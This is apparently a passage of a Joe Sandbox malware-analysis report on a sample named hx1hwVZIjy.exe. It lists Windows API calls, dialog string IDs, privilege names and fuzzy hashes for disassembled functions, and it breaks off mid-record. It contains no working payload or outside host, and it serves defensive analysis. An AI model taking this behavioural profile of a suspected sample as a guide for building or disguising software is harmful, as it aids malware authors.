                  • String ID:
                  • API String ID: 2148572870-0
                  • Opcode ID: de564980f520ad445ac8568fcca608db077d33a1f7451f1ac5dedc7bc2ef1a31
                  • Instruction ID: c694b5b96f05d3ee1d0184d21451d3b49a7aed73e7fbf500d549a5e1451c54cb
                  • Opcode Fuzzy Hash: de564980f520ad445ac8568fcca608db077d33a1f7451f1ac5dedc7bc2ef1a31
                  • Instruction Fuzzy Hash: 94F03C72E0111DBBCB215FA1DC4CEEBBF6DEF513A1F008012FA06D2020D6348555D7A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • _wcschr.LIBVCRUNTIME ref: 00F4C435
                    • Part of subcall function 00F417AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00F3BB05,00000000,.exe,?,?,00000800,?,?,00F485DF,?), ref: 00F417C2
                  Strings
                  Similarity
                  • API ID: CompareString_wcschr
                  • String ID: <$HIDE$MAX$MIN
                  • API String ID: 2548945186-3358265660
                  • Opcode ID: 519a7004ebbe6b82b2f5d3dce0b6dea1d20abbe0aa6e690475d34cd26df803f6
                  • Instruction ID: 54684176a40c61a21efcb09f0062eb96998baef22c40be5f92190c5c8bf5732a
                  • Opcode Fuzzy Hash: 519a7004ebbe6b82b2f5d3dce0b6dea1d20abbe0aa6e690475d34cd26df803f6
                  • Instruction Fuzzy Hash: CC318372D00209AADB61DA94CC51FEA7BBCEB54710F004066FE05E6091EBB59EC4DA90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadBitmapW.USER32(00000065), ref: 00F4ADFD
                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00F4AE22
                  • DeleteObject.GDI32(00000000), ref: 00F4AE54
                  • DeleteObject.GDI32(00000000), ref: 00F4AE77
                    • Part of subcall function 00F49E1C: FindResourceW.KERNEL32(00F4AE4D,PNG,?,?,?,00F4AE4D,00000066), ref: 00F49E2E
                    • Part of subcall function 00F49E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00F4AE4D,00000066), ref: 00F49E46
                    • Part of subcall function 00F49E1C: LoadResource.KERNEL32(00000000,?,?,?,00F4AE4D,00000066), ref: 00F49E59
                    • Part of subcall function 00F49E1C: LockResource.KERNEL32(00000000,?,?,?,00F4AE4D,00000066), ref: 00F49E64
                  Strings
                  Similarity
                  • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                  • String ID: ]
                  • API String ID: 142272564-3352871620
                  • Opcode ID: b81b428bc4410be04111bb5e787ab72119aca9b56a93eb4710ffe05bcb508f5b
                  • Instruction ID: e2b922a8788389ec5b70cb4bae10640f9ddad276f74e084ed94112bf9de1a5f8
                  • Opcode Fuzzy Hash: b81b428bc4410be04111bb5e787ab72119aca9b56a93eb4710ffe05bcb508f5b
                  • Instruction Fuzzy Hash: CE012632A80219A7D71067659C06A7F7F79AF81B61F080115FD10A72A1DF758C15B2B2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 00F3130B: GetDlgItem.USER32(00000000,00003021), ref: 00F3134F
                    • Part of subcall function 00F3130B: SetWindowTextW.USER32(00000000,00F635B4), ref: 00F31365
                  • EndDialog.USER32(?,00000001), ref: 00F4CCDB
                  • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00F4CCF1
                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 00F4CD05
                  • SetDlgItemTextW.USER32(?,00000068), ref: 00F4CD14
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ItemText$DialogWindow
                  • String ID: RENAMEDLG
                  • API String ID: 445417207-3299779563
                  • Opcode ID: 4086fdaf7d2764b15dec3e2c0d3747ee8e71eb828ad53d039ddd675bc16946bb
                  • Instruction ID: 78d087cfb264da48a1c145d0150a7cafa8fc3681a8095cccd84c20282e513542
                  • Opcode Fuzzy Hash: 4086fdaf7d2764b15dec3e2c0d3747ee8e71eb828ad53d039ddd675bc16946bb
                  • Instruction Fuzzy Hash: 48012833B862157ED5914F64AC49FAB3F6CEB9AB12F100411F746A20E0C6615904F7E5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F57573,00000000,?,00F57513,00000000,00F6BAD8,0000000C,00F5766A,00000000,00000002), ref: 00F575E2
                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F575F5
                  • FreeLibrary.KERNEL32(00000000,?,?,?,00F57573,00000000,?,00F57513,00000000,00F6BAD8,0000000C,00F5766A,00000000,00000002), ref: 00F57618
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AddressFreeHandleLibraryModuleProc
                  • String ID: CorExitProcess$mscoree.dll
                  • API String ID: 4061214504-1276376045
                  • Opcode ID: 9b8ffb7f63a90e0e45ef2bf84c13afabe96cfef46b661194de83381bda70825e
                  • Instruction ID: 8756b12dec4d7c5d162e05e69adf24dda62278e249c596812510534c868378b0
                  • Opcode Fuzzy Hash: 9b8ffb7f63a90e0e45ef2bf84c13afabe96cfef46b661194de83381bda70825e
                  • Instruction Fuzzy Hash: 23F0AF30A0861CBBCB11AB94DC09B9DBFB8EF04726F000068F805A2160DB709A48FA90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 00F40085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F400A0
                    • Part of subcall function 00F40085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F3EB86,Crypt32.dll,00000000,00F3EC0A,?,?,00F3EBEC,?,?,?), ref: 00F400C2
                  • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00F3EB92
                  • GetProcAddress.KERNEL32(00F781C0,CryptUnprotectMemory), ref: 00F3EBA2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AddressProc$DirectoryLibraryLoadSystem
                  • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                  • API String ID: 2141747552-1753850145
                  • Opcode ID: a7aff7689bf200c4a3a90be3e4a4159cb5141312f38fb4ac7f956c673f29272e
                  • Instruction ID: 08e5d104fe17ae8506cfaacf34808d86502e4108408660b8ce03ecb2b931eb0c
                  • Opcode Fuzzy Hash: a7aff7689bf200c4a3a90be3e4a4159cb5141312f38fb4ac7f956c673f29272e
                  • Instruction Fuzzy Hash: 7EE04670D00741AECB219F389808B42FEE56F14724F04881DE4E6E3280DAF4D584AF61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: _free
                  • String ID:
                  • API String ID: 269201875-0
                  • Opcode ID: c0b88439a1598ac369b7f0e854af657cd748edd6f6654a3ab797582fd6280d80
                  • Instruction ID: 04dc7d052695bfc633f4fbded5b0269faed26a0ff0064d62967ed06787fcd920
                  • Opcode Fuzzy Hash: c0b88439a1598ac369b7f0e854af657cd748edd6f6654a3ab797582fd6280d80
                  • Instruction Fuzzy Hash: CE41D236E003049FCB20EF78D881A5EB7E5EF85724F1545A8EA15EB251DB31AD05EB80
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetEnvironmentStringsW.KERNEL32 ref: 00F5B619
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F5B63C
                    • Part of subcall function 00F58518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F5C13D,00000000,?,00F567E2,?,00000008,?,00F589AD,?,?,?), ref: 00F5854A
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F5B662
                  • _free.LIBCMT ref: 00F5B675
                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F5B684
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                  • String ID:
                  • API String ID: 336800556-0
                  • Opcode ID: 00282a67ecb98b4af59a62cf8a33330143d5a34dd8e0b76156b17b61a734addb
                  • Instruction ID: d2680da6c3dd4399457d87dd0f2df1d616d62c5f2bbf674a4385231e2f38ccc8
                  • Opcode Fuzzy Hash: 00282a67ecb98b4af59a62cf8a33330143d5a34dd8e0b76156b17b61a734addb
                  • Instruction Fuzzy Hash: 4E01D472A01215BF632116766C9DC7B7A6DDEC7BB23150268FE04D3510EFA0CD06B1B0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetLastError.KERNEL32(?,00F70EE8,00000200,00F5895F,00F558FE,?,?,?,?,00F3D25E,?,032B3D70,00000063,00000004,00F3CFE0,?), ref: 00F5902E
                  • _free.LIBCMT ref: 00F59063
                  • _free.LIBCMT ref: 00F5908A
                  • SetLastError.KERNEL32(00000000,00F63958,00000050,00F70EE8), ref: 00F59097
                  • SetLastError.KERNEL32(00000000,00F63958,00000050,00F70EE8), ref: 00F590A0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ErrorLast$_free
                  • String ID:
                  • API String ID: 3170660625-0
                  • Opcode ID: d80c3abbc9f10e64e2b5701f6b675a0e699f08dd3abf376473b37e992220dacd
                  • Instruction ID: c315bbd57a6f33bab01e3570c53a31b95f3c4e84502397cecd3a2e546637eeb0
                  • Opcode Fuzzy Hash: d80c3abbc9f10e64e2b5701f6b675a0e699f08dd3abf376473b37e992220dacd
                  • Instruction Fuzzy Hash: C801F937A09A00BBC3266774AC85A2B365D9BD13B77240524FF26A31D1EFE8CC0E7150
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 00F40A41: ResetEvent.KERNEL32(?), ref: 00F40A53
                    • Part of subcall function 00F40A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00F40A67
                  • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00F4078F
                  • CloseHandle.KERNEL32(?,?), ref: 00F407A9
                  • DeleteCriticalSection.KERNEL32(?), ref: 00F407C2
                  • CloseHandle.KERNEL32(?), ref: 00F407CE
                  • CloseHandle.KERNEL32(?), ref: 00F407DA
                    • Part of subcall function 00F4084E: WaitForSingleObject.KERNEL32(?,000000FF,00F40A78,?), ref: 00F40854
                    • Part of subcall function 00F4084E: GetLastError.KERNEL32(?), ref: 00F40860
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                  • String ID:
                  • API String ID: 1868215902-0
                  • Opcode ID: 02f95810e78dcbfe8429ece74ddab4a5af466b13fe9afe73de728d548563d4bd
                  • Instruction ID: 5160134342bd2bacc9cfe125c432ad33435d75946e12f2cd8ca15b25116bb1f1
                  • Opcode Fuzzy Hash: 02f95810e78dcbfe8429ece74ddab4a5af466b13fe9afe73de728d548563d4bd
                  • Instruction Fuzzy Hash: 7A01B571440708FFC7219B65DD84FC6BBF9FB48710F000529F66A42160CBB56A48EB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • _free.LIBCMT ref: 00F5BF28
                    • Part of subcall function 00F584DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00F5BFA7,00F63958,00000000,00F63958,00000000,?,00F5BFCE,00F63958,00000007,00F63958,?,00F5C3CB,00F63958), ref: 00F584F4
                    • Part of subcall function 00F584DE: GetLastError.KERNEL32(00F63958,?,00F5BFA7,00F63958,00000000,00F63958,00000000,?,00F5BFCE,00F63958,00000007,00F63958,?,00F5C3CB,00F63958,00F63958), ref: 00F58506
                  • _free.LIBCMT ref: 00F5BF3A
                  • _free.LIBCMT ref: 00F5BF4C
                  • _free.LIBCMT ref: 00F5BF5E
                  • _free.LIBCMT ref: 00F5BF70
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: d007877089213c5002147491f27180e0edef39039d5f6bea2c677446a75fcd6a
                  • Instruction ID: dd04a8693ae296890fdb467e0cd0a0ccb886a5e4ee4f532f073c102240789b85
                  • Opcode Fuzzy Hash: d007877089213c5002147491f27180e0edef39039d5f6bea2c677446a75fcd6a
                  • Instruction Fuzzy Hash: 07F01237909205A7C620EBA4EE86C1B73D9BA007A17648805FE59E7D50CB74FC8AAA54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • _free.LIBCMT ref: 00F5807E
                    • Part of subcall function 00F584DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00F5BFA7,00F63958,00000000,00F63958,00000000,?,00F5BFCE,00F63958,00000007,00F63958,?,00F5C3CB,00F63958), ref: 00F584F4
                    • Part of subcall function 00F584DE: GetLastError.KERNEL32(00F63958,?,00F5BFA7,00F63958,00000000,00F63958,00000000,?,00F5BFCE,00F63958,00000007,00F63958,?,00F5C3CB,00F63958,00F63958), ref: 00F58506
                  • _free.LIBCMT ref: 00F58090
                  • _free.LIBCMT ref: 00F580A3
                  • _free.LIBCMT ref: 00F580B4
                  • _free.LIBCMT ref: 00F580C5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 7021daa15f431c411a2aa85726a3c6ae562b414c168dba10676937c32df342ed
                  • Instruction ID: 1a682c9972f5966e7014e9dfccbe7fa030473199d62045e86d9fcbfc6e81b623
                  • Opcode Fuzzy Hash: 7021daa15f431c411a2aa85726a3c6ae562b414c168dba10676937c32df342ed
                  • Instruction Fuzzy Hash: 01F03A7AC0212E8BC715BF15BC014053B65B7147A1309866BFD62A7A71DB35085ABFC1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\hx1hwVZIjy.exe,00000104), ref: 00F576FD
                  • _free.LIBCMT ref: 00F577C8
                  • _free.LIBCMT ref: 00F577D2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: _free$FileModuleName
                  • String ID: C:\Users\user\Desktop\hx1hwVZIjy.exe
                  • API String ID: 2506810119-241033897
                  • Opcode ID: 2ce0260f9211ad11ad31ff9332555b50a2f64a2cbed0717812faec5d00bba193
                  • Instruction ID: 6cf307ca8acba4a3a69f09e8f849f35288927591f890e7d1a381e40271ef3230
                  • Opcode Fuzzy Hash: 2ce0260f9211ad11ad31ff9332555b50a2f64a2cbed0717812faec5d00bba193
                  • Instruction Fuzzy Hash: BD319171E04309AFDB21EF99FC8199EBBFCEB89711F144066EE0497201D6744E49EB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __EH_prolog.LIBCMT ref: 00F37579
                    • Part of subcall function 00F33B3D: __EH_prolog.LIBCMT ref: 00F33B42
                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00F37640
                    • Part of subcall function 00F37BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00F37C04
                    • Part of subcall function 00F37BF5: GetLastError.KERNEL32 ref: 00F37C4A
                    • Part of subcall function 00F37BF5: CloseHandle.KERNEL32(?), ref: 00F37C59
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                  • API String ID: 3813983858-639343689
                  • Opcode ID: 3942005ee4461018392b03f486194005584d093639df308a7924f16e857236d0
                  • Instruction ID: d0630a23264ca816458ad89a40b4929b0c473e3edd655f0bbdbf034c2a20c72a
                  • Opcode Fuzzy Hash: 3942005ee4461018392b03f486194005584d093639df308a7924f16e857236d0
                  • Instruction Fuzzy Hash: 1C3190B1D08348AEDF20EB68DC12FEEBB69AF55364F044059F848A7252DB744A44EB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 00F3130B: GetDlgItem.USER32(00000000,00003021), ref: 00F3134F
                    • Part of subcall function 00F3130B: SetWindowTextW.USER32(00000000,00F635B4), ref: 00F31365
                  • EndDialog.USER32(?,00000001), ref: 00F4A4B8
                  • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00F4A4CD
                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 00F4A4E2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ItemText$DialogWindow
                  • String ID: ASKNEXTVOL
                  • API String ID: 445417207-3402441367
                  • Opcode ID: ea2efed69d9080ece165256f1e35b08a9849702593e0cb994d12e67b8353f6a0
                  • Instruction ID: 3df4e9e44f96a15220397b4ed22008e5d70da62c5df173f4726369f94e547206
                  • Opcode Fuzzy Hash: ea2efed69d9080ece165256f1e35b08a9849702593e0cb994d12e67b8353f6a0
                  • Instruction Fuzzy Hash: 6311B232684214BFDA21DF68DD4DF6E3FA9EB4A760F100006FA419B0B1CBA59905F723
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: __fprintf_l_strncpy
                  • String ID: $%s$@%s
                  • API String ID: 1857242416-834177443
                  • Opcode ID: 029947fa5c9988db7fd30d3f2943e77dc83d4c686806bf798aa15962b841326c
                  • Instruction ID: 2f6a93936c8cbbc59e33e295e5f2edd5815e182c144f6b073d8bafa736e7b398
                  • Opcode Fuzzy Hash: 029947fa5c9988db7fd30d3f2943e77dc83d4c686806bf798aa15962b841326c
                  • Instruction Fuzzy Hash: 2D216372840208ABEF21DEA4DC46FEE7BA8AF05720F040512FE1596191D375DA59FB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 00F3130B: GetDlgItem.USER32(00000000,00003021), ref: 00F3134F
                    • Part of subcall function 00F3130B: SetWindowTextW.USER32(00000000,00F635B4), ref: 00F31365
                  • EndDialog.USER32(?,00000001), ref: 00F4A9DE
                  • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00F4A9F6
                  • SetDlgItemTextW.USER32(?,00000067,?), ref: 00F4AA24
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
